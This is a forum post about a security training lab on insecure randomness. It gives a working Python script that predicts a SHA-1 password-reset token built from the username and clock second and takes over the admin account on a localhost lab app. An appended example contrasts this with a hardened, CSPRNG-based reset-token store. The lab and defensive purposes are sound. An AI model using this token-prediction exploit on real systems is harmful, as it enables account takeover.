Welcome to the Linux Foundation Forum!

Lack of Resources for Lab 4.1 - Insecure Randomness in Web Applications

Hello everyone,

I've been working on Lab 4.1, which involves exploiting weak randomization in a password reset function. However, the provided resources are insufficient for completing the lab effectively.

  • No guidance on interacting with the web application endpoints to exploit the vulnerability.
  • The provided solution uses a static datetime, not reflecting the dynamic nature of the actual application.

To help others, here’s a script that completes the lab, with added print statements for clarity:

    import requests
    import hashlib
    import datetime
    import time

    base_url = 'http://localhost:5000'

    # Step 1: Trigger the forget password functionality
    forget_password_url = f'{base_url}/passwordForget'
    admin_username = 'admin'
    print(f"[INFO] Initiating password reset for user '{admin_username}'...")
    response = requests.post(forget_password_url, data={'username': admin_username})

    if response.status_code == 200:
        print("[INFO] Password reset request sent successfully.")
    else:
        print("[ERROR] Failed to send password reset request.")
        raise SystemExit(1)

    # Step 2: Wait a second to ensure the timestamp is accurate
    time.sleep(1)

    # Calculate the reset token: SHA-1 over the username plus the current clock second
    current_time = datetime.datetime.now()
    timestamp = current_time.second
    to_hash = admin_username + str(timestamp)
    reset_token = hashlib.sha1(to_hash.encode('utf-8')).hexdigest()

    print(f"[INFO] Calculated reset token: {reset_token}")

    # Step 3: Use the reset token to reset the admin's password
    reset_password_url = f'{base_url}/reset'
    new_password = 'password1'
    print(f"[INFO] Sending password reset request with token '{reset_token}' and new password '{new_password}'...")
    response = requests.post(reset_password_url, data={
        'resetToken': reset_token,
        'username': admin_username,
        'password': new_password
    })

    if response.status_code == 200:
        print(f"[SUCCESS] Password for user '{admin_username}' has been reset to '{new_password}'.")
    else:
        print(f"[ERROR] Failed to reset the password. Server responded with status code {response.status_code}.")
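
Added example, not part of the original post or the lab's own code: the token scheme implied by the script above (SHA-1 over username plus clock second) shown beside a hardened replacement, to make the size of the weak token space concrete. `weak_token`, `weak_token_space` and `ResetTokenStore` are hypothetical names, and the server-side scheme is an assumption inferred from the post's script.

```python
import hashlib
import hmac
import secrets
import time

def weak_token(username, second):
    """Scheme implied by the post's script: SHA-1 over username + clock second."""
    return hashlib.sha1(f"{username}{second}".encode("utf-8")).hexdigest()

def weak_token_space(username):
    """Every token the weak scheme can ever issue for one user (seconds 0-59)."""
    return {weak_token(username, s) for s in range(60)}

class ResetTokenStore:
    """Hardened form: CSPRNG token, stored hashed, short lifetime, single use."""

    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self._pending = {}  # username -> (SHA-256 of token, expiry time)

    def issue(self, username, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        digest = hashlib.sha256(token.encode()).digest()
        self._pending[username] = (digest, now + self.ttl)
        return token  # sent out of band; not derivable from username or clock

    def redeem(self, username, token, now=None):
        now = time.time() if now is None else now
        # pop(): any attempt consumes the pending token, so guesses cannot be
        # repeated. Trade-off: a wrong guess forces the user to request a new one.
        entry = self._pending.pop(username, None)
        if entry is None:
            return False
        digest, expiry = entry
        presented = hashlib.sha256(token.encode()).digest()
        return now <= expiry and hmac.compare_digest(digest, presented)
```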
